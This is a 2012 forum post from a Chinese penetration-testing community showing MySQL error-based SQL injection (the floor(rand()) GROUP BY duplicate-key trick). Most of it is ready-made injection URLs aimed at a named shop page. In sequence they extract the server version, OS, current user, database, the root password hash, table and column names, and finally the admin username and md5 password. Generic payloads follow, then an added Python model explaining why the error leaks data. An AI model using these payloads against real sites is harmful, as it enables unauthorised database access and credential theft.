中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title: Blind injection in detail
Author: admin
Time: 2012-9-5 14:59
Determining the version number

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Determining the operating system

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current user()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current database()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
root password hash

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Table names in the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
The user_name column in the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
The password column in the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Getting the admin password (md5)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Error-based injection

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
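Every payload in this post leans on the same MySQL quirk: a GROUP BY whose key expression contains rand() is evaluated twice per source row (once to look the group up, once more to build the row that is inserted into the temporary table), so the second value can collide with a key that is already there and MySQL aborts with "Duplicate entry '...' for key 'group_key'", carrying the concat()'d subquery result in the message. The following Python model of that temp-table algorithm is an added example, not code from the original post; it assumes the commonly quoted leading values 0,1,1,0,1,1 of floor(rand(0)*2) and uses a constructed version string "5.5.62" as the leaked value. It shows why the seeded rand(0) payloads need at least three source rows to fire deterministically, and estimates how often the two-row `select 1 union select 2` payloads with unseeded rand() fire at all.

```python
"""Model of MySQL's GROUP BY temporary-table algorithm and the duplicate-key
error it produces when the grouping key is non-deterministic.

Added example; the rand(0) bit sequence and the leaked values are assumptions.
"""
import random


class DuplicateEntry(Exception):
    """Stands in for MySQL error 1062: Duplicate entry '...' for key 'group_key'."""


def group_by_count(rows, key_expr):
    """Model of SELECT count(*), <key_expr> x ... GROUP BY x.

    For each source row the server evaluates key_expr to probe the temp table.
    If no such group exists, it evaluates key_expr AGAIN to build the row it
    inserts. With a non-deterministic key_expr the inserted value can already
    be present, which raises the duplicate-key error.
    """
    table = {}
    for _ in rows:
        probe = key_expr()
        if probe in table:
            table[probe] += 1
            continue
        inserted = key_expr()  # second evaluation, performed on insert
        if inserted in table:
            raise DuplicateEntry(f"Duplicate entry '{inserted}' for key 'group_key'")
        table[inserted] = 1
    return table


# Assumed: the leading values of floor(rand(0)*2) in MySQL (seeded, so fixed).
RAND0_FLOOR2 = [0, 1, 1, 0, 1, 1]


def make_key_expr(leaked_value, bits):
    """Callable modelling concat((<subquery>), 0x3a, floor(rand(...)*2)).

    Each call consumes the next bit, mirroring one rand() evaluation.
    """
    state = {"i": 0}

    def key_expr():
        i = state["i"]
        if i >= len(bits):
            raise ValueError("bit sequence exhausted; extend RAND0_FLOOR2")
        state["i"] = i + 1
        return f"{leaked_value}:{bits[i]}"

    return key_expr


def leak_via_group_by(leaked_value, row_count=3, bits=RAND0_FLOOR2):
    """Run the modelled query over row_count source rows.

    Returns the error text (which carries the leaked value) or None if the
    query completed without a collision.
    """
    try:
        group_by_count(range(row_count), make_key_expr(leaked_value, bits))
    except DuplicateEntry as e:
        return str(e)
    return None


def two_row_success_rate(trials=10000, seed=1):
    """Estimate how often the post's two-row, unseeded rand() payload fires.

    Unseeded rand() is modelled with independent fair bits; the model predicts
    an error only when row 2 probes a fresh key and then inserts a colliding
    one, i.e. about one run in four.
    """
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        bits = [rng.randrange(2) for _ in range(4)]  # at most 4 evaluations
        if leak_via_group_by("v", row_count=2, bits=bits) is not None:
            hits += 1
    return hits / trials


if __name__ == "__main__":
    # Constructed leaked value standing in for @@version.
    print(leak_via_group_by("5.5.62", row_count=3))   # rand(0), 3 rows: fires
    print(leak_via_group_by("5.5.62", row_count=2))   # rand(0), 2 rows: silent
    print(two_row_success_rate())                     # unseeded, 2 rows: ~0.25
```

The model explains two things a practitioner runs into with these payloads: the `select 1 union select 2` derived table used throughout the post gives only two source rows, so with unseeded rand() the error shows up on roughly a quarter of requests and the page has to be reloaded until it does, whereas the rand(0) forms in the last section, driven off information_schema.tables (many rows), collide on the third row every time.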
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2